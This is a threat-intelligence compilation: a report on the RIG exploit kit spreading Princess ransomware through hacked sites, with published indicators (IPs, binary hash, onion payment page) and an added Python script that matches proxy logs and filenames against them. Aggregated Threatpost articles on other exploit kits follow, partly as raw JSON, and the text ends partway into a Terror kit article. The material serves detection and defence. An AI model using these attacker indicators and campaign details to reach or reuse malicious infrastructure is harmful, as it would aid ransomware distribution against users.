We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.
We [analyzed](<https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/>) the PrincessLocker ransomware last November and pointed out that, despite similarities with Cerber's onion page, the actual code was quite different. A [new payment page](<https://twitter.com/campuscodi/status/900434464341463043>) had been spotted in underground forums and is now being used in attacks in the wild.
### From hacked site to RIG EK
Compromised websites pushing exploit kits have become a rare sight. Many of those campaigns have switched to tech support scams instead, and most drive-by activity today originates from legitimate publishers via malvertising.
Here, however, we observed an injected iframe that redirected from the hacked site to a temporary gate, distinct from the well-known "Seamless" gate that has been dropping copious amounts of the Ramnit Trojan.

The final hop to the RIG exploit kit landing page is a standard HTTP 302 redirect. The landing page then attempts one of several Internet Explorer ([CVE-2013-2551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>), [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>), [CVE-2015-2419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419>), [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)) or Flash Player ([CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>)) exploits. All five vulnerabilities were patched between 2013 and 2016 (MS13-037, MS14-064, MS15-065, MS16-051 and Adobe APSB16-01 respectively), so this chain only succeeds against browsers and Flash plugins that are well behind on updates.
### Princess ransomware
Once exploitation succeeds, RIG downloads and runs the Princess ransomware. Victims find their files encrypted and renamed with a new extension, alongside a ransom note named `_USE_TO_REPAIR_[a-zA-Z0-9].html`, where `[a-zA-Z0-9]` stands for a random alphanumeric identifier.
![Princess ransom note](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/ransom.png>)
The payment page can be accessed via several provided links including a '_.onion_' one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.
![Princess payment page asking for 0.0770 BTC](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/BTC.png>)
### Down but still kicking
The exploit kit landscape is not what it was a year ago, but we would be remiss to disregard drive-by download attacks entirely. Malvertising is still thriving, and we are seeing increased activity and changing tactics from both established threat actors and newcomers.
We will update this post with additional information about Princess Locker if there is anything noteworthy to add.
### Indicators of compromise
RIG EK gate: `185.198.164.152`
RIG EK IP address: `188.225.84.28`
PrincessLocker binary (SHA-256): `c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7`
PrincessLocker payment page: `royall6qpvndxlsj[.]onion`
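As an added example (not code from the Malwarebytes post), here is how a defender could put these indicators and the redirect chain described above to work. The script parses a simplified, constructed proxy log (the six-column format, the client addresses, the clearnet gateway hostname and every log line are assumptions made for the example), flags clients that received a 302 from the gate IP and then fetched from the RIG IP within a short window, looks for the payment-page label in any requested host, checks filenames against the ransom note naming pattern, and compares a file's SHA-256 against the binary IOC.

```python
"""Sweep proxy logs and a file listing against the Princess/RIG IOCs.

Added example, not code from the Malwarebytes post. The log format is an
assumed one: timestamp client status method url dest_ip, space separated.
"""
import hashlib
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Indicators published in the post.
RIG_GATE_IP = "185.198.164.152"
RIG_EK_IP = "188.225.84.28"
PRINCESS_SHA256 = "c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7"
PAYMENT_ONION = "royall6qpvndxlsj.onion"

# Ransom note: _USE_TO_REPAIR_<random alphanumeric id>.html
RANSOM_NOTE_RE = re.compile(r"^_USE_TO_REPAIR_[A-Za-z0-9]+\.html$", re.IGNORECASE)


@dataclass
class Event:
    ts: datetime
    client: str
    status: int
    url: str
    dest_ip: str


def parse_log(text: str) -> list:
    """Parse the assumed space-separated format; skip blank or malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, client, status, _method, url, dest_ip = parts
        events.append(Event(datetime.fromisoformat(ts), client, int(status), url, dest_ip))
    return events


def find_rig_chains(events: list, window_s: int = 30) -> list:
    """Return (client, gate_ts, rig_ts) for every client that got a 302 from the
    gate IP and then contacted the RIG IP within window_s seconds."""
    by_client = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_client.setdefault(ev.client, []).append(ev)
    chains = []
    for client, evs in by_client.items():
        for i, ev in enumerate(evs):
            if ev.dest_ip != RIG_GATE_IP or ev.status != 302:
                continue
            for later in evs[i + 1:]:
                if later.ts - ev.ts > timedelta(seconds=window_s):
                    break
                if later.dest_ip == RIG_EK_IP:
                    chains.append((client, ev.ts, later.ts))
                    break
    return chains


def payment_page_hits(events: list) -> list:
    """URLs whose host carries the payment-page onion label. Direct Tor traffic
    never shows up in a proxy log; this only catches a clearnet gateway copy of
    the link (assumption: the victim opens one of the non-.onion links)."""
    label = PAYMENT_ONION.split(".")[0]
    return [ev.url for ev in events if label in (urlsplit(ev.url).hostname or "")]


def is_ransom_note(filename: str) -> bool:
    return bool(RANSOM_NOTE_RE.match(filename))


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_princess_binary(data: bytes) -> bool:
    return sha256_hex(data) == PRINCESS_SHA256


# Constructed sample input: 10.0.0.5 walks the full chain and later opens the
# payment page through an invented gateway host; 10.0.0.7 only touches the gate.
SAMPLE_LOG = """\
2017-08-30T10:00:01 10.0.0.5 200 GET http://hacked-site.example/index.php 203.0.113.10
2017-08-30T10:00:02 10.0.0.5 302 GET http://185.198.164.152/?id=3 185.198.164.152
2017-08-30T10:00:03 10.0.0.5 200 GET http://188.225.84.28/?MjUxOTk= 188.225.84.28
2017-08-30T10:00:06 10.0.0.5 200 GET http://188.225.84.28/?s=5 188.225.84.28
2017-08-30T10:05:00 10.0.0.7 200 GET http://news.example/ 198.51.100.8
2017-08-30T10:06:00 10.0.0.7 302 GET http://185.198.164.152/?id=9 185.198.164.152
2017-08-30T10:10:00 10.0.0.5 200 GET http://royall6qpvndxlsj.onion.example/ 192.0.2.9
"""
SAMPLE_FILES = ["report.docx", "_USE_TO_REPAIR_f3Kq9Z.html", "USE_TO_REPAIR.html"]

if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for client, t0, t1 in find_rig_chains(evs):
        print(f"RIG chain: {client} gate {t0:%H:%M:%S} -> landing {t1:%H:%M:%S}")
    print("payment page:", payment_page_hits(evs))
    print("ransom notes:", [f for f in SAMPLE_FILES if is_ransom_note(f)])
```

The chain check keys on the 302 from the gate followed by the RIG IP rather than on either address alone, which keeps a lone gate hit (a blocked or abandoned redirect, as with 10.0.0.7 in the sample) from raising the same alert as a completed handoff to the landing page.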
The post [RIG exploit kit distributes Princess ransomware](<https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).
Author: Jérôme Segura, Malwarebytes Labs. Published 2017-08-31. CVEs referenced: CVE-2013-2551, CVE-2014-6332, CVE-2015-2419, CVE-2015-8651, CVE-2016-0189.
{"threatpost": [{"lastseen": "2018-10-06T22:53:15", "description": "Despite [a marked decrease in activity](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>), exploit kits haven\u2019t completely disappeared just yet. The Neptune, or Terror Exploit Kit, is alive and well; during the last month, researchers have observed the kit as part of a campaign to abuse a legitimate popup ad service to drop cryptocurrency miners.\n\nResearchers with FireEye [said Tuesday](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the kit has been redirecting victims with popups from fake hiking ads to exploit kit landing pages and in turn to HTML and Adobe Flash exploits. Researchers elected not to disclose the name of the popup ad service, but stressed that it\u2019s within Alexa\u2019s top 100.\n\nThe landing pages run a handful of exploits, including three targeting Internet Explorer (CVE-2016-0189, CVE-2015-2419, CVE-2014-6332) and two targeting Flash (CVE-2015-8651, CVE-2015-7645).\n\nAccording to FireEye researchers Zain Gardezi and Manish Sardiwal, the malvertising redirects are mimicking the domains of actual hiking sites, and in some instances sites that allow users to convert YouTube videos to MP3s. 
Once redirected, the ads, most which appear on high-traffic torrent and multimedia hosting sites, drop a Monero miner.\n\nMonero, an open source cryptocurrency that bills itself as \u201csecure, private, and untraceable\u201d has caught on with cybercriminals over the last several months.\n\nOne cryptocurrency miner [Adylkuzz](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) was spotted in April using the same NSA Eternal Blue exploit and DoublePulsar rootkit that spread WannaCry, to infect computers and mine Monero.\n\nAccording to FireEye, for the new Neptune EK campaign a uniform resource identifier (URI) belonging to the exploit kit domain has been dropping the payload as a plain executable. After a machine has been infected, attempts are made to log in to minergate[.]com, a cryptocurrency GUI miner and mining pool, with the attacker\u2019s email address.\n\nResearchers noticed this campaign on July 16 and were able to pin it on changes in the kit\u2019s URI patterns.\n\nSpreading resource intensive cryptocurrency miners helps attackers raise small amounts of money that can potentially be used to fund other future attacks.\n\n[Attackers in June](<https://threatpost.com/attackers-mining-cryptocurrency-using-exploits-for-samba-vulnerability/126191/>) used an exploit for a Samba vulnerability patched in May to spread payloads that spread Monero miners. Researchers with Kaspersky Lab who discovered the operation said that attackers hardcoded their wallet and pool address into the attack and managed to raise $6,000 USD via the campaign.\n\nThe vulnerabilities that Neptune uses are dated; in fact Microsoft fixed one of them in November 2014, CVE-2014-6332, which could have allowed remote code execution via Windows OLE vulnerabilities. 
Gardezi and Sardiwal warn that users running out-of-date or unpatched software could still be at risk, especially as drive-by download kits such as Neptune have taken a shine to using malvertisements to push malicious downloads of late.\n\nSimilar to Sundown, the Neptune/Terror exploit kit is one of several that popped up following Angler\u2019s disappearance in 2016. Researchers said [in May earlier this year](<https://threatpost.com/terror-exploit-kit-evolves-into-larger-threat/125816/>) that the kit had adopted new anti-detection features and slowly evolved into a threat.\n", "cvss3": {}, "published": "2017-08-22T17:51:58", "type": "threatpost", "title": "Neptune Exploit Kit Dropping Cryptocurrency Miners Through Malvertisements", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T21:51:58", "id": "THREATPOST:3F20438316043C71AAD9C85191711EEE", "href": "https://threatpost.com/neptune-exploit-kit-dropping-cryptocurrency-miners-through-malvertisements/127591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:18", "description": "Security experts are warning some \u201cQuit Smoking\u201d and \u201c20 Minute Fat Loss\u201d ads online are delivering more than sales pitches. According to researchers at Zscaler, ads are redirecting browsers to malicious landing pages hosting the Terror exploit kit.\n\nThe campaigns have been sustained, with the initial blast spotted on Sept. 1 and lasting through Oct. 23.\n\n\u201cTerror EK activity has been low throughout the year but we are starting to see an uptick in the activity delivered via malvertising campaigns in past two months,\u201d according to Rohit Hegde security researcher at Zscaler.\n\nThe Terror EK is distinguished for being a relatively new exploit kit, first identified earlier this year. 
In a [separate Zscaler report](<https://www.zscaler.com/blogs/research/top-exploit-kit-activity-roundup-winter-2017>), researchers said the EK borrows from other kits such as Sundown and Hunter with additional pieces borrowed from exploits built for the penetration testing software Metasploit.\n\n\u201cWe\u2019ve continued tracking the development of this kit since we first spotted it, and have watched developers transition to new domains with stolen identities, with traffic coming from the PopAds advertising network,\u201d said Derek Gooley, Zscaler security researcher.\n\nOver the past two months, a typical attack includes Terror EK redirects in the form of fake advertisements in the form of pop-up ads. \u201cThe initial JavaScript that gets served via a malicious advertisement page is obfuscated,\u201d Hegde said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/10/06222252/ZDF_plot_2Months.png>)\n\n\u201cWhen a request is sent to the .php page, it responds with a HTTP 302 redirect to Terror EK Landing page,\u201d researchers said. And that Terror EK landing page contains the VBScript and JavaScript exploits.\n\nAccording to researchers, the Terror exploit kit is targeting two vulnerabilities [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>) and [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>). One of the bugs (CVE-2016-0189) is a scripting engine memory corruption vulnerability in Jscript (5.8) and VBScript (5.7, 5.8) engines used in Internet Explorer 9 through 11. 
The second (CVE-2014-6332) is a 2014 flaw called a Windows OLE automation array remote code execution vulnerability found in multiple versions of Windows from 7 to 8.1.\n\nIn addition to those two CVEs, researchers said, the landing page also calls to another URL, which tries to load three Flash exploits.\n\n\u201cThe Terror EK actors have now started protecting their SWF files from decompilers using the DComSoft SWF Protector,\u201d Zscaler explains. SWF Protector is software to protect SWF files and to make them secure.\n\nAs for the payload, researchers say the malware served in the most recent Terror EK malvertising chains belongs to the Smoke Loader downloader Trojan family.\n\n\u201cWe observed that Smoke Loader payload with MD5 hash of \u201c6ea344d0db80ab6e5cabdc9dcecd5ad4\u2033 was served for an active Terror EK cycle earlier this week the most recent payload has MD5 hash of \u2018b23745bcd2937b9cfaf6a60ca72d3d67\u2019,\u201d wrote researchers.\n\nSmoke Loader is also known as [the Backdoor.Win32.Mokes, a](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>)[ Backdoor.Win32.Mokes](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>)[ Backdoor.Win32.Mokes](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>)[ Trojan](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>) designed to give attackers remote control over an infected computer.\n", "cvss3": {}, "published": "2017-10-25T08:28:31", "type": "threatpost", "title": "Malvertising Campaign Redirects Browsers To Terror Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189"], "modified": "2017-10-25T08:28:31", "id": "THREATPOST:C7FFC7E4C14F88FBB68B38188CC067E2", "href": "https://threatpost.com/malvertising-campaign-redirects-browsers-to-terror-exploit-kit/128596/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:43", "description": "When 
an exploit kit fades away, it usually doesn\u2019t take long for another to take its place in the limelight, especially when the kit is an integral part of the ransomware ecosystem.\n\nThat\u2019s exactly what\u2019s happened over the past few weeks as researchers say they\u2019ve seen an uptick in RIG Exploit Kit traffic used to peddle CrypMIC ransomware.\n\nThe news comes two weeks [after researchers shut down a global malvertising campaign](<https://threatpost.com/malvertising-campaign-pushing-neutrino-exploit-kit-shut-down/120322/>) that was delivering the same ransomware but via the Neutrino Exploit Kit. While RIG is far from new \u2013 it was pushing Cryptowall ransomware on victims [as far back as 2014](<https://threatpost.com/rig-exploit-kit-pushing-cryptowall-ransomware/106540/>) \u2013 it has enjoyed a spike in the days following Neutrino\u2019s decline, researchers say.\n\nAccording to experts at Heimdal Security, who have tracked the kit\u2019s traffic over the past 20 days, it\u2019s [picking up where Neutrino left off](<https://heimdalsecurity.com/blog/security-alert-rig-exploit-kit-crypmic-ransomware/>). A new campaign is using script injection to compromise legitimate websites and redirect victims to hijacked domains pushing CrypMIC. Andra Zaharia, a security evangelist with the Danish firm, said some attacks are using malicious iFrame HTML code as the injects.\n\nRIG is using a technique previously utilized by the Angler Exploit Kit, [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396/>), to redirect users. Attackers use stolen domain credentials to set up subdomains to divert traffic to the arbitrary sites. 
Domain owners are often none the wiser because many neglect to monitor their login credentials and fail to notice after they\u2019ve been compromised in a phishing attack.\n\nAccording to Zaharia, the new campaign bears a resemblance to [Pseudo-Darkleech](<https://threatpost.com/the-changing-face-of-pseudo-darkleech/119036/>), a campaign that\u2019s been used for more than a year now to deliver exploit kits. Both campaigns use similar patterns when it comes to injecting malicious scripts and redirecting traffic to the exploit kit infrastructure, Zaharia said.\n\nResearchers with Cisco Talos, who took down the Neutrino-CrypMIC campaign 20 days ago, believe it exposed roughly one million users to malicious ads for the two weeks they followed it in early August. The researchers worked with GoDaddy to subsequently shut down domains that were being used by the campaign to redirect traffic to a server hosting Neutrino in Russia.\n\nThe RIG-CrypMIC campaign takes advantage of recent vulnerabilities in Adobe Flash Player, according to Heimdal. Following the exploit, CrypMIC is dropped into a Windows temporary folder with a random name. From there, the malware connects to a command and control server.\n\nWhile Zaharia told Threatpost they don\u2019t have the traffic numbers in full, she did confirm the payload\u2019s delivery efficiency is at 35.6 percent, spread out across different Flash exploits.\n\nThe exploits include CVE-2015-8651, a vulnerability that Adobe patched last December, and CVE-2016-4117, a zero day vulnerability [the company patched in May](<https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/>). Attackers embedded CVE-2016-4117 into Neutrino a week after it was patched by the company and the Scarcruft APT gang, a group that was spotted targeting Russia, Nepal, and South Korea, also leveraged the exploit. 
According to researchers at Kaspersky Lab, who identified the group in June, Scarcruft paired the exploit with watering hole attacks as part of [Operation Erebus](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), a series of attacks carried out in spring.\n\nThe campaign also uses an IE zero day, CVE-2016-0189, that Microsoft patched in May to carry out attacks. Developers behind Neutrino [incorporated that vulnerability into the exploit kit in July](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>).\n\nThe moves are positioning RIG to be the definitive exploit kit, for now at least, Zaharia said.\n\n\u201cWhen it comes to exploit kits, the dynamic is incredibly fast-moving. In the past month, two of the biggest exploit kit infrastructures were either taken down or suffered a big hit, so one of the other notorious exploit kits is bound to take advantage of the opportunity,\u201d Zaharia told Threatpost Wednesday, \u201cRIG is shaping up to be the go-to EK, but Magnitude, Sundown or others could also be working on their next big move.\n", "cvss3": {}, "published": "2016-09-21T09:29:38", "type": "threatpost", "title": "Picking Up Where Neutrino Left Off: RIG Pushing CrypMIC Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-8651", "CVE-2016-0189", "CVE-2016-4117"], "modified": "2016-09-21T13:29:38", "id": "THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D", "href": "https://threatpost.com/rig-picks-up-where-neutrino-left-off-pushes-crypmic-ransomware/120735/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:52:15", "description": "What we can glean from a 2018 roundup of current web-threats is old vulnerabilities die hard. 
In a report, released by Palo Alto Networks Unit 42, researchers said so far this year cybercriminals are targeting unpatched PCs with ancient CVEs and well-known exploit kits.\n\nHere is a ThreatList from the research firm\u2019s _Current Trends in Web-based Threats_ report, released last month.\n\nIn the first quarter of 2018, Unit 42 found 1583 malicious URLs across 496 different domains. Attackers used at least eight old and public vulnerabilities. The Top 3 CVEs used are:\n\n 1. [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>): Vulnerability in [Microsoft Internet Explorer\u2019s VBScript](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>)\n 2. [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>): Vulnerability in [Microsoft Internet Explorer\u2019s VBScript](<https://threatpost.com/microsoft-patches-jscript-vbscript-flaw-under-attack/117993/>)\n 3. [CVE-2015-5122](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122>): Vulnerability in [Adobe Flash Player](<https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776/>)\n\nUnit 42 also reported of the 1,583 URLs found in malicious emails it examined, 1,284 were exploit kit related.\n\nTop exploit kits are:\n\n * KaiXin\n * Sundown\n * Rig\n * Sinowal\n\n\u201cWe found Sundown and Rig EKs are slowing down not only in the number of vulnerabilities used but also in how often they are upgraded. However, KaiXin EK is still evolving. As we can see (below) KaiXin takes the lead when compared with Sundown and Rig. KaiXin was discovered in 2012 and became more and more active according our observations. The most exploited vulnerabilities in KaiXin are CVE-2016-0189 and CVE-2014-6322. 
We saw the very old EK Sinowal was also active with one malicious URL,” [researchers wrote](<https://researchcenter.paloaltonetworks.com/2018/06/unit42-the-old-and-new-current-trends-in-web-based-threats/>).

[Chart: top exploit kits observed in Q1 2018, from the Unit 42 report](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/06/25103219/EK_top_2018.png>)

(ThreatList is an occasional overview of the InfoSec landscape as represented in at-a-glance lists of relevant data.)

Source: Threatpost, [ThreatList: Exploit Kits Still a Top Web-based Threat](<https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/>), published 2018-07-02. CVEs referenced: CVE-2014-6322, CVE-2014-6332, CVE-2015-5122, CVE-2016-0189. CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

### Exploit Kit Activity Quiets, But is Far From Silent

Over the past six months, the roar of exploit kits has [quieted to a whimper](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>). But that doesn’t mean exploit kit threats are nonexistent. According to security experts, the gangs behind them are regrouping, tweaking code and finding fresh software exploits to target.

Here are the exploit kits and exploit kit trends to watch for over the next six months.

**RIG: Down But Not Out**

According to Zscaler, the RIG exploit kit is diminished, but continues to drop various ransomware payloads such as CryptoShield, Cerber and Locky, primarily in South America, Southeast Asia, and Australia.
That’s a shift, according to Zscaler, from targeting Western Europe, North America, and Russia.

“Unless anything changes, Rig is the exploit kit to watch out for as we head into summer 2017,” said Brad Duncan, threat intelligence analyst, Unit 42, Palo Alto Networks.

He said Rig is the most prevalent exploit kit Unit 42 has seen since the Angler exploit kit disappeared in the summer of 2016 and the Neutrino exploit kit went private in September 2016. Rig was formerly a mid-tier exploit kit compared to others; however, it’s been by far the most common since late 2016, he said.

Microsoft has also been tracking RIG (which it calls Meadgive). “Attackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file,” [Microsoft noted](<https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/>).

**The Dawn of Sundown**

As RIG’s impact continues to diminish, the Sundown exploit kit has been sluggishly gaining momentum over the past year. Recently, its authors have made noteworthy changes to its landing page. According to Zscaler, those changes include rebranding the exploit kit “Nebula.”

“Where .xyz domains had been the primary choice for hosting landing pages, since Feb.
9, the [criminal organization Yugoslavian Business Network] has been registering domains with many other generic top-level domains in the name of Brian Krebs,” [wrote Derek Gooley](<https://www.zscaler.com/blogs/research/top-exploit-kit-activity-roundup-%E2%80%93-winter-2017>), security researcher at Zscaler.

Earlier this month, the Sundown exploit kit gained some traction dropping the banking Trojan DiamondFox, Gooley said.

FireEye reports that Sundown has shown a propensity for adapting frequently, for example changing URIs and incorporating new techniques such as steganography.

**Magnitude at Low Volumes**

Once a dominant exploit kit, Magnitude is a shadow of its former threat, according to security experts. “The Magnitude EK continues to operate at low volume, with restricted regional distribution. We typically observe Magnitude affecting Southeast Asian users who visit illegal streaming sites,” Gooley wrote.

He notes that Magnitude’s modus operandi includes distribution via malicious ads on popup and pop-under ad networks attempting to install the Cerber ransomware.

**New Terrors**

New exploit kits also continue to surface, such as the Terror exploit kit, identified by Zscaler earlier this year. Terror is an example of a newer exploit kit cobbled together from pieces of other exploit kits such as Sundown and Hunter, according to Zscaler.

Terror is typical of newer exploit kits. “It’s smaller, more customized and their target is much more defined and they have chosen a very specific geographic area to target,” said Deepen Desai, senior director of research and operations at Zscaler.
Keeping activity regional and limited in scope, he said, suggests criminals are fine-tuning Terror before rolling it out to a larger pool of victims.

[Check Point said](<http://blog.checkpoint.com/2017/04/13/marchs-wanted-malware-list-exploit-kits-rise-popularity/>) both Rig and Terror have recently been tracked delivering a wide variety of threats, from ransomware and banking Trojans to spambots and Bitcoin miners. The security firm reported an uptick in Terror exploit kit activity in the month of March.

**GongDa and KaiXin**

Researchers are keeping their eyes on two older exploit kits targeting Korea, named GongDa and KaiXin. In January, FireEye reported a Korean news site was redirecting visitors to the GongDa exploit kit, exposing them to malware.

“While GongDa is an older exploit kit that continues to use Java exploits, it has also been found delivering both Flash and VBScript exploits as well. Despite its shortcomings when compared to newer EK’s such as Angler or Neutrino, GongDa proves that old tricks (or vulnerabilities) can still work effectively,” wrote FireEye in a research [note earlier this year](<https://www.fireeye.com/blog/threat-research/2016/03/gongda_vs_koreanne.html>).

Zscaler has spotted a new KaiXin exploit kit campaign as recently as last month. KaiXin, first identified in 2012, also targets Asian sites (Korea in particular). The latest incarnation of the exploit kit features an older antivirus fingerprinting script that attempts to determine whether security products are present on the targeted PC’s filesystem before continuing execution. The KaiXin campaign offers exploits for Java, Flash, and Silverlight and, if successful, installs various Chinese adware packages.

**New Targets**

But the vital ingredient to a successful exploit kit is a fresh supply of vulnerabilities.
To that end, security experts at Unit 42 of Palo Alto Networks note a trend by cybercriminals to target new vulnerabilities in Microsoft’s Edge browser.

Ryan Olson, intelligence director, said crooks behind Sundown have added new Microsoft Edge browser vulnerabilities to their list of attack vectors. Some of the vulnerabilities, according to Olson, include memory corruption flaws within the browser’s rendering engine. He said Microsoft patched the vulnerabilities last year; nevertheless, they found their way into the Sundown exploit kit.

Another example of new targets comes from an exploit kit called DNSChanger, spotted in December by Proofpoint researchers. Proofpoint said the exploit kit is unique because the malvertising component of the attack doesn’t target browsers [but rather a victim’s router](<https://threatpost.com/dnschanger-exploit-kit-hijacks-routers-not-browsers/122539/>). The goal is to attack vulnerable routers running outdated software and open ports for malicious purposes.

**Copycat Trend**

Researchers at FireEye said they have noticed a bevy of low-level exploit kit copycat operations that are most likely one-man operations. “While mostly recycling pre-existing techniques, their presence has been fairly consistent, albeit not being a huge threat in terms of numbers,” said Zain Gardezi, staff vulnerability researcher at FireEye.

In these particular cases, it has been observed that the copycats are usually attached to one ad service for a longer period of time for malvertisement delivery, Gardezi said. Their usage of registered domains is also limited due to the fairly distinguishable pattern. “Some copycats seem to use one particular IP for 3 to 4 days, instead of domain names, and then move on to another,” Gardezi said.
Sundown, for example, is known for using old exploits from older exploit kit packages from established players.

With so many big players out of commission, it has given rise to smaller players cutting and pasting old exploits to create their own patchwork EKs, FireEye said.

**Exploit Kit Struggles**

According to researchers, worries of a sudden resurgence in exploit kit activity are low. Unit 42’s Duncan credits better browser security with reducing the effectiveness of exploit kits. Others credit stepped-up defensive mitigation efforts.

“Google Chrome is currently at 58 percent market share, and it’s a much harder nut to crack for exploit kit authors, I think. Using Chrome as a web browser, I haven’t been able to infect any Windows hosts through exploit kits in recent months,” Duncan said.

He also notes that the dwindling popularity of some favorite targets of exploit kits, such as Internet Explorer and Microsoft Edge, is pushing some threat actors out of the EK racket.
Duncan said IE and Edge now only have a combined market share of 25 percent.

For its part, Microsoft’s exploit research shows many of the operators behind exploit kits such as Neutrino aren’t making splashy headlines anymore because many have gone into “private” mode, choosing to quietly cater to select cybercriminal groups.

Source: Threatpost, [Exploit Kit Activity Quiets, But is Far From Silent](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>), published 2017-04-14. CVEs referenced: CVE-2015-8651. CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE).

### Terror Exploit Kit Evolves Into Larger Threat

The relatively new Terror exploit kit is bucking the downward trend in the EK market, and is steadily evolving into more of a threat.

Researchers at Cisco Talos said Terror has abandoned an early strategy that included “carpet-bombing” a target’s browser in favor of one that uses exploits precisely targeted at a victim’s particular browser configuration. It’s also equipped with anti-detection features.

The kit is one of several new players that surfaced [after the market consolidated last year](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>), according to Cisco. “When Angler and friends disappeared, new EKs started to try their luck. Many of them were far from [Angler’s quality](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904/>).
One of these was Terror EK,” wrote Holger Unterbrink and Emmanuel Tacheau, researchers at [Cisco who posted their research Thursday](<http://blog.talosintelligence.com/2017/05/terror-evolved-exploit-kit-matures.html#more>).

Over the past several months, researchers say they have seen a “fast evolution up to the latest version” of Terror.

“We identified a potentially compromised legitimate website acting as a malware gate, redirecting visitors initially to a RIG exploit kit landing page, then switching to Terror exploit kit one day later,” they wrote.

To Cisco, this is an indicator that the criminals behind Angler, RIG and Terror are likely sharing resources or pirating the others’ means of distribution and attack tools.

As to Terror’s biggest improvements, researchers said the exploit kit now has the capability to evaluate a victim’s user environment (operating system, patch level, browser version and installed plugins) and use only the most potentially successful exploits against the victim.

This makes it harder for an investigator to fully uncover which exploits they have, Unterbrink and Tacheau wrote. Terror is also using cookie-based authentication in its attack chain. “This prevents anyone from downloading the exploits directly. Someone who did not follow the full attack chain may be a competitive cyber criminal who is trying to steal the exploits or a forensic investigator,” researchers wrote.

The exploits Terror is using aren’t new, just new to Terror, said Nick Biasini in an interview with Threatpost.

“In the past, Terror would send a wide array of exploits at the end system hoping that one would compromise the system.
Today, Terror is more selective and leverages the information gained from the landing page to deliver exploits to which the system is potentially vulnerable,” Biasini said.

The attack chain observed by Cisco begins with a compromised website that redirects the victim to the Terror landing page using an “HTTP 302 Moved Temporarily response.” The landing page is filled with random “Lorem Ipsum” text and also some obfuscated JavaScript code to evaluate the target’s browser environment and plugins in use such as ActiveX, Flash, PDF reader, Java, Silverlight and QuickTime, researchers wrote.

